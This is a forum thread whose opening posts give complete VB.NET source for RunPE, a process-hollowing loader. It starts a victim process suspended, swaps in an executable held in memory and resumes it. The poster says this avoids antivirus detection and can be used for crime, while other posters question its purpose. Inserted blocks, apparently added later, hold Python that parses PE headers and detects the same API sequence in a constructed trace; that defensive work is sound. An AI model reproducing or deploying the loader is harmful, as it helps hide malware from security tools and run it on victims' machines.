
Thread: [VB.NET] RunPE

  1. #1

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    [VB.NET] RunPE

    Code:
    'Made by JapaBrz
    Imports System.Runtime.InteropServices
    Imports System.Text
    
    Class DD
        <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
    Structure STARTUPINFO
            Public cb As Integer
            Public lpReserved As String
            Public lpDesktop As String
            Public lpTitle As String
            Public dwX As Integer
            Public dwY As Integer
            Public dwXSize As Integer
            Public dwYSize As Integer
            Public dwXCountChars As Integer
            Public dwYCountChars As Integer
            Public dwFillAttribute As Integer
            Public dwFlags As Integer
            Public wShowWindow As Short
            Public cbReserved2 As Short
            Public lpReserved2 As Integer
            Public hStdInput As Integer
            Public hStdOutput As Integer
            Public hStdError As Integer
        End Structure
        Private Structure PROCESS_INFORMATION
            Public hProcess As IntPtr
            Public hThread As IntPtr
            Public dwProcessId As Integer
            Public dwThreadId As Integer
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Private Structure IMAGE_DOS_HEADER
            Public e_magic As UInt16
            ' Magic number
            Public e_cblp As UInt16
            ' Bytes on last page of file
            Public e_cp As UInt16
            ' Pages in file
            Public e_crlc As UInt16
            ' Relocations
            Public e_cparhdr As UInt16
            ' Size of header in paragraphs
            Public e_minalloc As UInt16
            ' Minimum extra paragraphs needed
            Public e_maxalloc As UInt16
            ' Maximum extra paragraphs needed
            Public e_ss As UInt16
            ' Initial (relative) SS value
            Public e_sp As UInt16
            ' Initial SP value
            Public e_csum As UInt16
            ' Checksum
            Public e_ip As UInt16
            ' Initial IP value
            Public e_cs As UInt16
            ' Initial (relative) CS value
            Public e_lfarlc As UInt16
            ' File address of relocation table
            Public e_ovno As UInt16
            ' Overlay number
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _
            Public e_res1 As UInt16()
            ' Reserved words
            Public e_oemid As UInt16
            ' OEM identifier (for e_oeminfo)
            Public e_oeminfo As UInt16
            ' OEM information; e_oemid specific
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _
            Public e_res2 As UInt16()
            ' Reserved words
            Public e_lfanew As Int32
            ' File address of new EXE header
        End Structure
        <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
        Private Structure VS_VERSIONINFO
            Public wLength As UInt16
            Public wValueLength As UInt16
            Public wType As UInt16
            <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _
            Public szKey As String
            Public Padding1 As UInt16
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Structure SECURITY_ATTRIBUTES
            Public nLength As Integer
            Public lpSecurityDescriptor As IntPtr
            Public bInheritHandle As Integer
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Private Structure VS_FIXEDFILEINFO
            Public dwSignature As UInt32
            Public dwStrucVersion As UInt32
            Public dwFileVersionMS As UInt32
            Public dwFileVersionLS As UInt32
            Public dwProductVersionMS As UInt32
            Public dwProductVersionLS As UInt32
            Public dwFileFlagsMask As UInt32
            Public dwFileFlags As UInt32
            Public dwFileOS As UInt32
            Public dwFileType As UInt32
            Public dwFileSubtype As UInt32
            Public dwFileDateMS As UInt32
            Public dwFileDateLS As UInt32
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Public Structure FLOATING_SAVE_AREA
    
    
            Public ControlWord As UInteger
            Public StatusWord As UInteger
            Public TagWord As UInteger
            Public ErrorOffset As UInteger
            Public ErrorSelector As UInteger
            Public DataOffset As UInteger
            Public DataSelector As UInteger
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _
            Public RegisterArea As Byte()
            Public Cr0NpxState As UInteger
    
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Public Structure CONTEXT
    
    
            Public ContextFlags As UInteger
            'set this to an appropriate value
            ' Retrieved by CONTEXT_DEBUG_REGISTERS
            Public Dr0 As UInteger
            Public Dr1 As UInteger
            Public Dr2 As UInteger
            Public Dr3 As UInteger
            Public Dr6 As UInteger
            Public Dr7 As UInteger
            ' Retrieved by CONTEXT_FLOATING_POINT
            Public FloatSave As FLOATING_SAVE_AREA
            ' Retrieved by CONTEXT_SEGMENTS
            Public SegGs As UInteger
            Public SegFs As UInteger
            Public SegEs As UInteger
            Public SegDs As UInteger
            ' Retrieved by CONTEXT_INTEGER
            Public Edi As UInteger
            Public Esi As UInteger
            Public Ebx As UInteger
            Public Edx As UInteger
            Public Ecx As UInteger
            Public Eax As UInteger
            ' Retrieved by CONTEXT_CONTROL
            Public Ebp As UInteger
            Public Eip As UInteger
            Public SegCs As UInteger
            Public EFlags As UInteger
            Public Esp As UInteger
            Public SegSs As UInteger
            ' Retrieved by CONTEXT_EXTENDED_REGISTERS
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _
            Public ExtendedRegisters As Byte()
    
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
      Public Structure IMAGE_OPTIONAL_HEADER32
            '
            ' Standard fields.
            '
            Public Magic As UInt16
            Public MajorLinkerVersion As [Byte]
            Public MinorLinkerVersion As [Byte]
            Public SizeOfCode As UInt32
            Public SizeOfInitializedData As UInt32
            Public SizeOfUninitializedData As UInt32
            Public AddressOfEntryPoint As UInt32
            Public BaseOfCode As UInt32
            Public BaseOfData As UInt32
            '
            ' NT additional fields.
            '
            Public ImageBase As UInt32
            Public SectionAlignment As UInt32
            Public FileAlignment As UInt32
            Public MajorOperatingSystemVersion As UInt16
            Public MinorOperatingSystemVersion As UInt16
            Public MajorImageVersion As UInt16
            Public MinorImageVersion As UInt16
            Public MajorSubsystemVersion As UInt16
            Public MinorSubsystemVersion As UInt16
            Public Win32VersionValue As UInt32
            Public SizeOfImage As UInt32
            Public SizeOfHeaders As UInt32
            Public CheckSum As UInt32
            Public Subsystem As UInt16
            Public DllCharacteristics As UInt16
            Public SizeOfStackReserve As UInt32
            Public SizeOfStackCommit As UInt32
            Public SizeOfHeapReserve As UInt32
            Public SizeOfHeapCommit As UInt32
            Public LoaderFlags As UInt32
            Public NumberOfRvaAndSizes As UInt32
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _
            Public DataDirectory As IMAGE_DATA_DIRECTORY()
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
    Public Structure IMAGE_FILE_HEADER
            Public Machine As UInt16
            Public NumberOfSections As UInt16
            Public TimeDateStamp As UInt32
            Public PointerToSymbolTable As UInt32
            Public NumberOfSymbols As UInt32
            Public SizeOfOptionalHeader As UInt16
            Public Characteristics As UInt16
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
    Public Structure IMAGE_DATA_DIRECTORY
            Public VirtualAddress As UInt32
            Public Size As UInt32
        End Structure
        Public Structure IMAGE_NT_HEADERS
            Public Signature As UInt32
            Public FileHeader As IMAGE_FILE_HEADER
            Public OptionalHeader As IMAGE_OPTIONAL_HEADER32
        End Structure
        Public Enum IMAGE_SIZEOF_SHORT_NAME
            IMAGE_SIZEOF_SHORT_NAME = 8
        End Enum
        Public Structure Misc
            Public PhysicalAddress As System.UInt32
            Public VirtualSize As System.UInt32
        End Structure
        Public Structure IMAGE_SECTION_HEADER
            Public Name As System.Byte
            Public Misc As Misc
            Public VirtualAddress As System.UInt32
            Public SizeOfRawData As System.UInt32
            Public PointerToRawData As System.UInt32
            Public PointerToRelocations As System.UInt32
            Public PointerToLinenumbers As System.UInt32
            Public NumberOfRelocations As System.UInt16
            Public NumberOfLinenumbers As System.UInt16
            Public Characteristics As System.UInt32
        End Structure
    
        Public Const CONTEXT_X86 = &H10000
        Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1)          'SS:SP, CS:IP, FLAGS, BP
        Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2)          'AX, BX, CX, DX, SI, DI
        Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4)         'DS, ES, FS, GS
        Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8)   '387 state
        Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7
        Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS)
        Public Const CREATE_SUSPENDED = &H4
        Public Const MEM_COMMIT As Long = &H1000&
        Public Const MEM_RESERVE As Long = &H2000&
        Public Const PAGE_NOCACHE As Long = &H200
        Public Const PAGE_EXECUTE_READWRITE As Long = &H40
        Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
        Public Const PAGE_EXECUTE_READ As Long = &H20
        Public Const PAGE_EXECUTE As Long = &H10
        Public Const PAGE_WRITECOPY As Long = &H8
        Public Const PAGE_NOACCESS As Long = &H1
        Public Const PAGE_READWRITE As Long = &H4

  2. #2

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    Code:
        <DllImport("kernel32.dll")> _
        Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32
        End Function
        <DllImport("kernel32.dll")> _
        Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
        End Function
        <DllImport("kernel32.dll")> _
        Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
        End Function
    
        <DllImport("kernel32.dll")> _
        Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer
        End Function
        <DllImport("kernel32.dll")> _
        Private Shared Function CreateProcess(ByVal lpApplicationName As String, _
        ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _
         ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _
        ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _
       <[In]()> ByRef lpStartupInfo As STARTUPINFO, _
       <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean
        End Function
    
        <DllImport("kernel32.dll", _
        SetLastError:=True, _
        CharSet:=CharSet.Auto, _
        EntryPoint:="WriteProcessMemory", _
        CallingConvention:=CallingConvention.StdCall)> _
     Shared Function WriteProcessMemory( _
     ByVal hProcess As IntPtr, _
     ByVal lpBaseAddress As IntPtr, _
     ByVal lpBuffer As Byte(), _
     ByVal iSize As Int32, _
     <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
        End Function
        <DllImport("kernel32.dll", _
    SetLastError:=True, _
    CharSet:=CharSet.Auto, _
    EntryPoint:="WriteProcessMemory", _
    CallingConvention:=CallingConvention.StdCall)> _
    Shared Function WriteProcessMemoryI( _
    ByVal hProcess As IntPtr, _
    ByVal lpBaseAddress As IntPtr, _
    ByVal lpBuffer As IntPtr, _
    ByVal iSize As Int32, _
    <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
        End Function
        <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _
        Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _
        ByVal lpBaseAddress As Integer, _
        ByRef lpbuffer As IntPtr, _
        ByVal size As Integer, _
        ByRef lpNumberOfBytesRead As Integer) As Int32
        End Function
        <DllImport("ntdll.dll")> _
        Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long
        End Function
    
        <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _
        Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
        End Function
        <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
        Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer
        End Function
    
        Const GENERIC_READ As Int32 = &H80000000
        Const FILE_SHARE_READ As UInt32 = &H1
        Const OPEN_EXISTING As UInt32 = 3
        Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80
        Const INVALID_HANDLE_VALUE As Int32 = -1
        Const PAGE_READONLY As UInt32 = &H2
        Const FILE_MAP_READ As UInt32 = &H4
        Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D
        Const RT_VERSION As Int32 = 16
    
        Private Enum ImageSignatureTypes
            IMAGE_DOS_SIGNATURE = &H5A4D     ''\\ MZ
            IMAGE_OS2_SIGNATURE = &H454E     ''\\ NE
            IMAGE_OS2_SIGNATURE_LE = &H454C  ''\\ LE
            IMAGE_VXD_SIGNATURE = &H454C     ''\\ LE
            IMAGE_NT_SIGNATURE = &H4550      ''\\ PE00
        End Enum
    
        Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String)
            Dim sVersion As [String] = Nothing
            Dim pidh As IMAGE_DOS_HEADER
            Dim context As CONTEXT = New CONTEXT()
    
            Dim Pinh As IMAGE_NT_HEADERS
            Dim Pish As IMAGE_SECTION_HEADER
    
            Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION()
            Dim si As STARTUPINFO = New STARTUPINFO()
    
            Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
            Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
    
    		'converts a data type in another type.
    		'since .net types are different from types handle by winAPI,  DirectCall a API will cause a type mismatch, since .net types
    		' structure is completely different, using different resources.
            Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned)
            Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32
            pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType)
            MyGC.Free()
    
            If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then
                Exit Sub
            End If
    
            Dim vt As Integer = ptbuffer + pidh.e_lfanew
            Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType)
    
            Dim addr As Long, lOffset As Long, ret As UInteger
            si.cb = Len(si)
            context.ContextFlags = CONTEXT86_INTEGER
    		
    		'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub
            If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub
            If GetThreadContext(pi.hThread, context) And _
                ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _
                ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then
    
                Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
                If ImageBase <> 0 Then
                    WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret)
    
                    lOffset = pidh.e_lfanew + 248
                    For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1
    				'math changes, anyone with pe understanding know
                        Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType)
                        Dim braw(Pish.SizeOfRawData) As Byte
    					'more math for reading only the section.  mm API has a "shortcut" when you pass a specified startpoint.
    					'.net can't use so you have to make a new array
                        For j As Integer = 0 To Pish.SizeOfRawData - 1
                            braw(j) = b(Pish.PointerToRawData + j)
                        Next
                        WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret)
                        VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr)
                    Next i
                    Dim bb As Byte() = BitConverter.GetBytes(ImageBase)
    
                    WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret)
                    context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
                    Call SetThreadContext(pi.hThread, context)
                    Call ResumeThread(pi.hThread)
                End If
            End If
        End Sub
    
        Private Shared Function Protect(ByVal characteristics As Long) As Long
            Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
                            PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
                            PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
    
            Protect = mapping(RShift(characteristics, 29))
        End Function
    	
        Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
            RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
        End Function
        Private Shared Function vbLongToULong(ByVal Value As Long) As Double
            Const OFFSET_4 = 4294967296.0#
            If Value < 0 Then
                vbLongToULong = Value + OFFSET_4
            Else
                vbLongToULong = Value
            End If
        End Function
    	
    End Class
    Made by JapaBrz


    Works somehow only under XP. Has, I think, something to do with the API calls.
    Last edited by alexjanjic; Jan 21st, 2010 at 01:16 PM.
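    The offsets the section loop in post #2 hardcodes (e_lfanew + 248, i * 40) and its Protect() table come straight from the PE32 header layout. The Python below is an added analysis example, not the thread's code: it parses those headers from a constructed two-section PE32 image, applies the same characteristics-to-protection lookup, and flags sections whose raw data lies outside the file or outside SizeOfImage (the copy loop in post #2 would index past its buffer on such a file). Function and field names are my own.

```python
"""PE32 header parser: the fields the RunPE code in post #2 walks by hand.
Added for analysis/triage; not the thread's code. Sample image is constructed."""
import struct

# Page-protection constants as in the thread, and the eight-entry table its
# Protect() indexes with Characteristics >> 29 (the Write, Read, Execute bits).
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE = 0x1, 0x2, 0x4
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x10, 0x20, 0x40
PROTECT_MAP = [PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, PAGE_EXECUTE_READ,
               PAGE_READWRITE, PAGE_EXECUTE_READWRITE,
               PAGE_READWRITE, PAGE_EXECUTE_READWRITE]
IMAGE_DOS_SIGNATURE, IMAGE_NT_SIGNATURE, PE32_MAGIC = 0x5A4D, 0x4550, 0x10B
SIZEOF_FILE_HEADER, SIZEOF_SECTION_HEADER = 20, 40   # 40 is the "i * 40" above
# 4 (signature) + 20 + 224 (PE32 optional header) = the "e_lfanew + 248" above.


class PEFormatError(ValueError):
    pass


def section_protection(characteristics):
    """Same lookup as the thread's Protect(): top three bits pick the protection."""
    return PROTECT_MAP[(characteristics >> 29) & 0x7]


def parse_pe32(data):
    """Return the header fields a loader needs plus per-section bounds checks."""
    if len(data) < 64:
        raise PEFormatError("shorter than IMAGE_DOS_HEADER")
    e_magic, = struct.unpack_from("<H", data, 0)
    e_lfanew, = struct.unpack_from("<I", data, 60)
    if e_magic != IMAGE_DOS_SIGNATURE:
        raise PEFormatError("missing MZ signature")
    if e_lfanew + 4 + SIZEOF_FILE_HEADER > len(data):
        raise PEFormatError("e_lfanew points outside the file")
    signature, = struct.unpack_from("<I", data, e_lfanew)
    if signature != IMAGE_NT_SIGNATURE:
        raise PEFormatError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 4 + SIZEOF_FILE_HEADER
    if opt_size < 96 or opt + opt_size > len(data):
        raise PEFormatError("optional header truncated")
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise PEFormatError("not a PE32 (32-bit) optional header")
    entry_point, = struct.unpack_from("<I", data, opt + 16)   # AddressOfEntryPoint
    image_base, = struct.unpack_from("<I", data, opt + 28)    # ImageBase
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * SIZEOF_SECTION_HEADER    # == e_lfanew + 248 + i*40
        if off + SIZEOF_SECTION_HEADER > len(data):
            raise PEFormatError("section table truncated at entry %d" % i)
        (name, vsize, va, raw_size, raw_ptr, _, _, _, _,
         chars) = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize,
            "raw_size": raw_size, "raw_pointer": raw_ptr,
            "characteristics": chars, "protect": section_protection(chars),
            # The thread copies b(PointerToRawData + j) for j < SizeOfRawData;
            # on a truncated or crafted file that read runs past the buffer.
            "in_file": raw_ptr + raw_size <= len(data),
            # The copy destination must also lie inside the SizeOfImage mapping.
            "fits_image": va + max(vsize, raw_size) <= size_of_image,
        })
    return {"e_lfanew": e_lfanew, "entry_point": entry_point, "image_base": image_base,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "sections": sections}


def build_sample_pe32():
    """Constructed minimal PE32 image: .text (read/execute) and .data (read/write)."""
    e_lfanew = 0x80
    dos = (struct.pack("<H", IMAGE_DOS_SIGNATURE) + b"\0" * 58
           + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIII", PE32_MAGIC, 1, 0, 0x200, 0x200, 0,
                      0x1000, 0x1000, 0x2000)                  # standard fields
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII",                # NT fields
                       0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                       0x3000, 0x200, 0, 2, 0, 0x100000, 0x1000,
                       0x100000, 0x1000, 0, 16)
    opt += b"\0" * 128                                          # 16 empty data dirs
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0x10, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)                  # CODE | EXECUTE | READ
    secs += struct.pack("<8sIIIIIIHHI", b".data", 0x10, 0x2000, 0x200, 0x400,
                        0, 0, 0, 0, 0xC0000040)                 # INIT_DATA | READ | WRITE
    headers = (dos + b"PE\0\0" + file_hdr + opt + secs).ljust(0x200, b"\0")
    return headers + b"\xC3" * 0x200 + b"\x41" * 0x200          # fake section bodies
```

    Running parse_pe32 over build_sample_pe32()[:0x500] shows the .data entry with in_file False, which is the kind of malformed input a triage script should reject before any loader-style copy.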

  3. #3
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    Uh-huh... okaaay... so???? What does it do? How do you use it?

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

  4. #4
    Wait... what? weirddemon's Avatar
    Join Date
    Jan 2009
    Location
    USA
    Posts
    3,828

    Re: [VB.NET] RunPE

    Is that the same as this and this?
    CodeBank contributions: Process Manager, Temp File Cleaner

    Quote Originally Posted by SJWhiteley
    "game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....

  5. #5
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    I dunno... but anything that has "NOT TO USE FOR CRIMINAL STUFF" as a disclaimer sure seems dubious to me.

    -tg

  6. #6

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    Quote Originally Posted by weirddemon
    Is that the same as this and this?
    Yes, but for .NET; that's VB6.

  7. #7
    Wait... what? weirddemon's Avatar
    Join Date
    Jan 2009
    Location
    USA
    Posts
    3,828

    Re: [VB.NET] RunPE

    Quote Originally Posted by techgnome
    I dunno... but anything that has "NOT TO USE FOR CRIMINAL STUFF" as a disclaimer sure seems dubious to me.

    -tg
    Agreed.

    Is it safe to say no one knows what this does?

  8. #8
    Wait... what? weirddemon's Avatar
    Join Date
    Jan 2009
    Location
    USA
    Posts
    3,828

    Re: [VB.NET] RunPE

    I scanned over the code real quick and it looks like this is an example on how to edit memory... I think...

  9. #9

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    This is a PE loader: you can run your EXE in memory without actually having to double-click the executable.

  10. #10
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    What's wrong with Process.Start()?
    My free .NET Windows API library (Version 2.2 Released 12/06/2011)

    Blog: cjwdev.wordpress.com
    Web: www.cjwdev.co.uk


  11. #11

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    Quote Originally Posted by chris128
    What's wrong with Process.Start()?
    Process.Start() makes a process start normally, like a double-click, but like this you can load the process from your resources and write the PE into memory by creating a process with the CREATE_SUSPENDED flag and writing the PE from the resources into the process. This avoids, let's say, AV detection because it isn't run normally; that's why it can also be used for criminal stuff, but only smart people could do that. I bet 80% of the forum doesn't even know how to use this code.

  12. #12
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    So what is the "non-criminal" use for this? Also, if it's that easy to get a program running without an AV detecting it, then surely pretty much all viruses would just do that and none would ever be detected..


  13. #13
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by chris128
    So what is the "non-criminal" use for this? Also, if it's that easy to get a program running without an AV detecting it, then surely pretty much all viruses would just do that and none would ever be detected..

    The "non-criminal" use could be, for example, in a "live-CD"-like application, where you don't want to touch the hard disk. There are many more examples, but I don't have enough time to write them all.

    And yes, it is already the case that almost all modern malware uses this technique. In the past (5-6 years ago), using this method, malware was much more undetected. Today, almost all anti-malware software has developed heuristic analysis methods for detecting suspicious behaviours like the API calls used in the code posted above.
    These heuristic scans (referred to as runtime scans in the hacker scene) also often result in false positives.
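    Post #13 describes AV heuristics that key on the API-call pattern of the code in post #2 rather than on the file itself. The Python below is an added example of that kind of behavioural check, not code from the thread: it scans a constructed, line-based API trace for the CreateProcess(CREATE_SUSPENDED), NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread sequence aimed at one target process. The trace line format and the choice to treat the unmap and allocate steps as optional are my assumptions.

```python
"""Behavioural detection of the suspended-create / write / SetThreadContext /
ResumeThread sequence over a constructed API trace (one event per line).
Added example; the trace format is invented for this demonstration."""
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x4   # the &H4 the thread passes to CreateProcess

# Stages in the order the loader in post #2 performs them. NtUnmapViewOfSection
# is the ntdll export name behind the thread's ZwUnmapViewOfSection import.
STAGES = {
    "CreateProcess": 0,          # counts only when flags include CREATE_SUSPENDED
    "NtUnmapViewOfSection": 1,
    "VirtualAllocEx": 2,
    "WriteProcessMemory": 3,
    "SetThreadContext": 4,
    "ResumeThread": 5,
}
# Unmap and allocate vary between loaders; these four are the core of the pattern.
REQUIRED = {0, 3, 4, 5}

LINE_RE = re.compile(r"pid=(\d+) api=(\w+) target=(\d+)(?: flags=(0x[0-9a-fA-F]+))?$")


def detect_hollowing(trace_lines):
    """Return [(injector_pid, target_pid, stages_seen)] for suspicious pairs."""
    first_seen = defaultdict(dict)        # (pid, target) -> {stage: line index}
    for n, line in enumerate(trace_lines):
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, api, target, flags = m.groups()
        if api not in STAGES and api[:-1] in STAGES:
            api = api[:-1]                # fold CreateProcessA/W onto one name
        if api not in STAGES:
            continue
        stage = STAGES[api]
        if stage == 0 and not (int(flags or "0", 16) & CREATE_SUSPENDED):
            continue                      # a normal (non-suspended) start is benign
        first_seen[(pid, target)].setdefault(stage, n)
    findings = []
    for (pid, target), seen in first_seen.items():
        if not REQUIRED.issubset(seen):
            continue
        order = [seen[s] for s in sorted(REQUIRED)]
        if order == sorted(order):        # suspended create precedes write/ctx/resume
            findings.append((int(pid), int(target), sorted(seen)))
    return findings


# Constructed trace: pid 1200 performs the full sequence against pid 4321;
# pid 1300 is a normal start; pid 1400 suspends and resumes without writing.
SAMPLE_TRACE = """\
pid=1200 api=CreateProcessW target=4321 flags=0x4
pid=1200 api=NtUnmapViewOfSection target=4321
pid=1200 api=VirtualAllocEx target=4321
pid=1200 api=WriteProcessMemory target=4321
pid=1200 api=WriteProcessMemory target=4321
pid=1200 api=SetThreadContext target=4321
pid=1200 api=ResumeThread target=4321
pid=1300 api=CreateProcessW target=5555 flags=0x0
pid=1300 api=ResumeThread target=5555
pid=1400 api=CreateProcessA target=6000 flags=0x4
pid=1400 api=ResumeThread target=6000
""".splitlines()
```

    A debugger also creates suspended and resumes, which is why the rule insists on a cross-process write and a context change in between before it fires.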

  14. #14
    Stack Overflow moderator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    The "non-criminal" use could be, for example, in a "live-CD"-like application
    Well, VB.NET isn't really bootable (and this code only runs under XP), and running in memory doesn't stop you from touching the hard disk (why not just run it from the CD?)...

  15. #15
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by minitech
    Well, VB.NET isn't really bootable (and this code only runs under XP), and running in memory doesn't stop you from touching the hard disk (why not just run it from the CD?)...
    This code does run under Windows Vista and 7, 32-bit as well as 64-bit too (as far as I know on all Windows NTs, so it would work in Win98).
